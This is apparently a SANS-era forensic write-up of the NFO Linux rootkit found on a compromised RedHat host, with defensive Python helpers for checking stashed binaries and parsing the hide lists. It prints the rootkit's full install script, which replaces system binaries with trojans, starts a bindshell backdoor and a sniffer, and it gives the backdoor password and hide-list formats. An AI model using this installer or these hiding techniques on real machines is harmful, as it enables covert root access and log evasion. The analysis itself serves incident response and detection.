Analysis of N.F.O hacking- / rootkit
08/03/2000
The kit I'm about to analyze is a root/hacking kit that was found
on a compromised machine running RedHat 5.2. The machine was probably rooted using
a root exploit against the POP2 daemon (version 4.46).
If you have any more information or insights, please send us a note
at intrusion@sans.org.
The Tools
The directory where this kit was found was /usr/include/rpc/".. "
(note the trailing space in the name, which makes it look like the parent directory in a listing).
They installed a few backdoors and trojans into the system that give
them root access and hide their presence. These are the files that were found
in the directory I mentioned above.
slimsheet:~/nfo# ls -al
drwxr-xr-x 9 root root 4096 Dec 31 23:31 kit2/
-rw-r--r-- 1 root root 459397 Oct 27 14:35 kit_OUT_99.tgz
-rwxr-xr-x 1 ftp 50 13766 Nov 21 21:36 t666*
-rwxr-xr-x 1 root root 106096 Nov 20 05:26 wget*
slimsheet:~/nfo# ls -al kit2/
-rwxr-xr-x 1 root root 13762 Dec 10 20:55 admbind*
drwxr-xr-x 2 root root 4096 Sep 29 18:32 bd/
drwxr-xr-x 2 root root 4096 Jan 2 22:23 bnc/
-rwxr-xr-x 1 root root 1059 Oct 3 01:49 install*
drwxr-xr-x 2 root root 4096 Sep 29 18:32 pty/
-rw-r--r-- 1 root root 1 Dec 31 23:32 readme
drwxr-xr-x 2 root root 4096 Dec 5 21:44 resetlog/
drwxr-xr-x 2 root root 4096 Dec 31 23:30 scans/
drwxr-xr-x 2 root root 4096 Sep 29 18:32 sniff/
drwxr-xr-x 2 root root 4096 Sep 30 16:21 trojans/
Analysis
Three files were found in the directory: kit_OUT_99.tgz, t666 and wget. The file kit_OUT_99.tgz
was the original compressed kit, which unpacks into ./kit2/ when you untar
it. wget is used to fetch files from other servers on the Internet. t666
is a bind/named remote exploit for almost every OS out there; it exploits
bind version 8.2.(X). If we enter the directory kit2 we'll find three more
files at the top level: admbind, install and readme.
admbind is, I believe, another remote exploit for bind. The readme
file is where the sniffer ./sniff/lins logs all connections, but this file
was empty (0 kb). The install file is a /bin/sh shell script that looks like
this :
#!/bin/sh
# backup: copy the original binaries to hidden dot-files under /usr/doc/
echo "Instalacao do Kit NFO GROUP v1.5"
if [ "$1" != "-install" ]; then
    echo "Use: ./install -install" ; echo ""
    exit
fi
echo -n "[*] Iniciando Backup..."
/bin/cp /bin/ls /usr/doc/.sl
/bin/cp /bin/ps /usr/doc/.sp
/bin/cp /bin/netstat /usr/doc/.statnet
/bin/cp /usr/sbin/syslogd /usr/doc/.logdsys
/bin/cp /usr/sbin/tcpd /usr/doc/.dpct
/bin/cp /sbin/ifconfig /usr/doc/.gifnocfi
/bin/cp /usr/bin/find /usr/doc/.dnif
/bin/cp /bin/login /usr/doc/.nigol
echo "ok"
# installation: overwrite the system binaries with the trojaned versions
echo -n "[*] Iniciando instalacao..."
/bin/cp -f trojans/ls.trj /bin/ls
/bin/cp -f trojans/ps.trj /bin/ps
/bin/cp -f trojans/netstat.trj /bin/netstat
/bin/cp -f trojans/syslogd.trj /usr/sbin/syslogd
/bin/cp -f trojans/tcpd.trj /usr/sbin/tcpd
/bin/cp -f trojans/ifconfig.trj /sbin/ifconfig
/bin/cp -f trojans/find.trj /usr/bin/find
/bin/cp -f trojans/login.trj /bin/login
# the pty* hide lists read by the trojaned binaries are placed in /dev/
/bin/cp -f pty/pty* /dev/
echo "ok"
# start the bindshell backdoor on the given port, shown in ps as "lal"
echo -n "[*] Instalando backdoor..."
./bd/biba 14789632159 lal
echo "ok"
# start the packet sniffer
echo -n "[*] Sniffando..."
./sniff/lins
echo "ok"
echo "Instalacao completa :-)"
exit
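Because the installer copies every original binary to a hidden name under /usr/doc/ before overwriting it, those stashed copies give a responder a clean reference to compare against. The following is an added example for this write-up, not code from the kit: it hashes each replaced binary against its stash, using the pairs from the install script above, and takes a root= argument so it can be run on a mounted image instead of the live (trojaned) root.

```python
"""Compare the binaries the NFO install script replaces with the clean copies
it stashes under /usr/doc/. Added example for this write-up, not the kit's
code. BACKUP_PAIRS is taken from the install script; root= lets the check run
against a mounted disk image. Any stash file existing at all is already an
indicator of this kit, whatever the hash comparison says.
"""
import hashlib
import os
import tempfile

# (binary the installer overwrites, where it first copied the original)
BACKUP_PAIRS = [
    ("/bin/ls", "/usr/doc/.sl"), ("/bin/ps", "/usr/doc/.sp"),
    ("/bin/netstat", "/usr/doc/.statnet"), ("/usr/sbin/syslogd", "/usr/doc/.logdsys"),
    ("/usr/sbin/tcpd", "/usr/doc/.dpct"), ("/sbin/ifconfig", "/usr/doc/.gifnocfi"),
    ("/usr/bin/find", "/usr/doc/.dnif"), ("/bin/login", "/usr/doc/.nigol"),
]

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def compare_pairs(root="/", pairs=BACKUP_PAIRS):
    """Return {binary: verdict} for every pair, with paths taken relative to root."""
    verdicts = {}
    for live, stash in pairs:
        live_p = os.path.join(root, live.lstrip("/"))
        stash_p = os.path.join(root, stash.lstrip("/"))
        if not os.path.exists(stash_p):
            verdicts[live] = "no stash file"
        elif not os.path.exists(live_p):
            verdicts[live] = "stash present, binary missing"
        elif sha256_file(live_p) == sha256_file(stash_p):
            verdicts[live] = "stash present, identical"
        else:
            verdicts[live] = "REPLACED: stash present, binary differs"
    return verdicts

def demo():
    """Constructed fixture in a temp dir: fake /bin/ls replaced, fake /bin/ps untouched."""
    root = tempfile.mkdtemp()
    for rel, data in (("bin/ls", b"trojan"), ("usr/doc/.sl", b"original"),
                      ("bin/ps", b"same"), ("usr/doc/.sp", b"same")):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return compare_pairs(root)
```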
The directory ./bd/ includes one file called biba.
It's a binary that I believe is built from a copy of bindshell.c. When it's executed
by the install script it will put itself on port 14789632159. When you execute
./biba you'll receive the following :
and if you do :
# ./biba 31337 syslogd
it will bind a root shell to port 31337, and it will look
like syslogd is running when root executes ps aux. What this program
does is sit on the port you specify and listen for connections;
if you connect to it with a telnet client you won't be given any
text or banner, it will only wait for a password. If you enter
the correct password, you'll receive a /bin/bash prompt with uid=0 (root).
I managed to find the password for this binary using a simple "strings
biba": the password was #N#F#O#G.
If we change directory to ./bnc/ we'll find a normal
precompiled bouncer for IRC use and a file called bnc.conf, which is the
config file used by the binary "bnc". If we do a simple "cat bnc.conf"
we'll receive the following :
pt:54123        <-------- This is the port the bouncer will listen on for connections.
ps:ziggylinda   <-------- This is the password you need to enter to use the bouncer.
mu:3            <-------- This is the "Max User" setting; only 3 connections at a time.
dp:6667         <-------- Default IRC port to connect to, 6667 in this case.
When we move on we'll find an interesting directory called
./pty/. In this directory four files are found: ptyp, ptyq,
ptyr and ptys. All of those belong to the rootkit and its various trojans;
they are later moved to /dev. If we start by cat'ing ptyp we'll get the following
:
2 lins
3 biba
3 sadan
3 lal
3 cleans
3 z2
3 readme
3 in.telnetd
3 promisc
3 cat
3 grep
3 bash
3 sh
3 bnc
3 rpcscan
3 z0ne
This is the "process hiding" file for the trojaned /bin/ps. Every entry
with a 3 in front of it hides every process whose name contains that string
in the /bin/ps output. For example, the line 3 biba
hides every process string containing biba when you execute /bin/ps.
A line such as 2 lins hides all applications matching
the name lins.
The next file is ptyq and is the hiding file for
the trojaned netstat. It removes tcp/udp connections and sockets from or to the specified addresses,
uids and ports. If we cat it, it will look like :
0 0
1 200.241
1 200.244
1 200.243
1 200.242
1 expert.com.br
1 interconect.com.br
1 amazonline.com.br
1 libnet.com.br
2 200.241
2 200.242
2 200.240
2 200.243
2 200.242
2 libnet.com.br
2 amazonline.com.br
2 interconect.com.br
2 amazonline.com.br
2 14789632159
2 988889
3 14789632159
3 988889
5 /usr/include/rpc/".. "/kit/
Taken from the README for lrk (Linux RootKit):
type 0: hide uid
type 1: hide local address
type 2: hide remote address
type 3: hide local port
type 4: hide remote port
type 5: hide UNIX socket path
With this we see that the attackers want to hide all
connections from 200.241-244 and the domains libnet.com.br, expert.com.br,
amazonline.com.br and interconect.com.br. These are probably ISPs, and
it will be much easier to look for suspicious connections when we know
which domains they may come from. Note also the type 3 entries, which hide the
backdoor's local port, and the type 5 entry, which hides any UNIX socket under
the kit's hidden directory.
The next file is ptyr. Every name in this file
will be hidden from the trojaned ls and du. If we cat ptyr we'll get the following :
ptyp
ptyq
ptyr
ptys
..
As you may notice, those pty* files are hidden, and so is
the directory where the attacker(s) stored all the files.
The next and last file is ptys; it holds the addresses that the trojaned
syslogd will not log. The contents of ptys were :
200.244
200.245
200.241
200.242
expert.com.br
interconect.com.br
amazonline.com.br
libnet.com.br
Now the attackers are sure that no connections from their
hosts will be logged to the /var/log/* files or any other files syslogd
may log to. Note that this only affects the trojaned syslogd on the compromised
host; logs shipped to a separate loghost, or traffic recorded on the network,
still show these connections.
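Recovered pty* files are worth parsing rather than just reading, because together they tell a responder exactly which hosts, ports and process names the trojans are suppressing and therefore what to look for in evidence the trojans cannot touch. The following is an added example for this write-up, not code from the kit or from lrk: it parses the four files in the formats described above (ptyp and ptyq as "<type> <value>" lines, ptyr and ptys as one name per line) and summarises what is hidden; the sample contents are a constructed subset of the files shown in this analysis.

```python
"""Triage helper for the lrk-style hide lists (ptyp, ptyq, ptyr, ptys).
Added example for this write-up, not code from the kit or from lrk. It
parses the four /dev/pty* files as described above and reports what the
attacker hides, so a responder knows which hosts and process names to
look for in a remote loghost, a sniffer on another machine, or a clean image.
"""
from collections import defaultdict

# ptyq type column, from the lrk README quoted above.
PTYQ_TYPES = {0: "uid", 1: "local address", 2: "remote address",
              3: "local port", 4: "remote port", 5: "UNIX socket path"}
# ptyp types as the write-up describes them; other types are reported by number.
PTYP_TYPES = {2: "process name", 3: "process name substring"}

def _typed_lines(text):
    """Yield (type, value) from a '<type> <value>' file, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].isdigit():
            yield int(parts[0]), parts[1].strip()

def parse_hide_lists(ptyp, ptyq, ptyr, ptys):
    """Return {category: sorted values} for everything the kit hides."""
    report = defaultdict(set)
    for t, v in _typed_lines(ptyp):
        report["ps:" + PTYP_TYPES.get(t, "type %d" % t)].add(v)
    for t, v in _typed_lines(ptyq):
        report["netstat:" + PTYQ_TYPES.get(t, "type %d" % t)].add(v)
    report["ls/du:file name"].update(l.strip() for l in ptyr.splitlines() if l.strip())
    report["syslogd:address"].update(l.strip() for l in ptys.splitlines() if l.strip())
    return {k: sorted(v) for k, v in report.items()}

def hidden_hosts(report):
    """Every address or host name hidden from netstat or syslogd, as one list."""
    keys = ("netstat:local address", "netstat:remote address", "syslogd:address")
    return sorted(set().union(*(report.get(k, []) for k in keys)))

# Constructed sample: a subset of the file contents shown in this write-up.
SAMPLE_PTYP = "2 lins\n3 biba\n3 lal\n3 in.telnetd\n3 bnc\n"
SAMPLE_PTYQ = ("0 0\n1 200.241\n1 expert.com.br\n2 200.241\n2 libnet.com.br\n"
               "3 14789632159\n5 /usr/include/rpc/\".. \"/kit/\n")
SAMPLE_PTYR = "ptyp\nptyq\nptyr\nptys\n..\n"
SAMPLE_PTYS = "200.244\n200.241\nexpert.com.br\nlibnet.com.br\n"

def sample_report():
    return parse_hide_lists(SAMPLE_PTYP, SAMPLE_PTYQ, SAMPLE_PTYR, SAMPLE_PTYS)
```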
If we enter the directory resetlog we'll see six
files. I won't display the files here as they are mostly large and are
made to clean logs. If I do "head -n 5 sadan" we receive the following
:
# [-] Sadan del log v 5.0 - BETA
# [-] written by the_sphinx to NFO group '99
# [-] ninefortyone@hotmail.com
#
#!/bin/bash
As you see, it's a shell script written by the_sphinx for NFO
group '99. It seems that he can be reached at ninefortyone@hotmail.com
if you need to contact him concerning his "log-cleaning skills". There's
another file called sadan-4_0-pt.sh in the same directory, and we found
this in the file :
echo; echo ; echo "[S] SADAN del log 4.0 - PORTUGUES"
echo "[S] sysdenial - tdoors@mailbr.com.br"
echo "[S] NFO Group OwnZ - Brazil - Out/99"
Yet another guy writing scripts for log cleaning. I also
have to remark that I doubt "NFO Group OwnZ".
The next directory we enter is called scans,
and it's from this directory that all the network scans were made. When we found
this kit there were only two files in this directory, rpcscan and
z0ne. z0ne is a tool to gather IPs from a top-level domain, e.g. to gather
all IPs of *.edu. In the directory resetlog we found a file called
.logs, which was simply the output of "find / -name *log* > .logs", and in this file we
found the following entries :
/usr/include/rpc/.. /kit2/scans/mc.log.qpop
/usr/include/rpc/.. /kit2/scans/no.log.qpop
/usr/include/rpc/.. /kit2/scans/no.log
/usr/include/rpc/.. /kit2/scans/200.log
Here we see that the hacker has been scanning *.no and
the class A network 200.x.x.x for vulnerabilities. We also notice that someone
scanned *.no and (maybe) *.mc for vulnerable versions of QPOP.
The next directory was called sniff and included
two files: lins, an Ethernet packet sniffer whose default
log file was ./readme, and promisc,
a publicly available tool used to find sniffers on all network interfaces
(eth0, eth1, etc.).
As you see in the file called "install" that I showed
at the beginning, the files in ./trojans/ are replacements for the original binaries.
Notice that these are trojaned ONCE!
Network detection of this intrusion
The detection of this intrusion was fairly easy, but it
shows that a skilled administrator knows what's happening on his machine.
The administrator found an application named "bnc" running as uid=0 (root),
so he simply did "find / -name *bnc*" and found the secret directory
I mentioned before. He noticed that he had been compromised and handled
it very well.
Conclusion
I hope this analysis will help administrators in the
future to detect intrusions on their networks, and I hope they realize that
it's not hard for hackers to hide themselves on a compromised system. This
is only a simple example, but I hope it will help.
Additional comments
As usual, a compromise like this would easily have been detected
on a host running file-integrity software such as Tripwire. But this just
shows us that there are skilled administrators out there, and I'm happy
to see such a thing. I also want you to notice that I only pasted parts
of the files from the rootkit; this hacking / rootkit has been sent to
SANS and they will publish it if they feel it's necessary.
Last modified: 08/03/2000
Author: Fredrik Ostergren (fredrik.ostergren@freebox.com)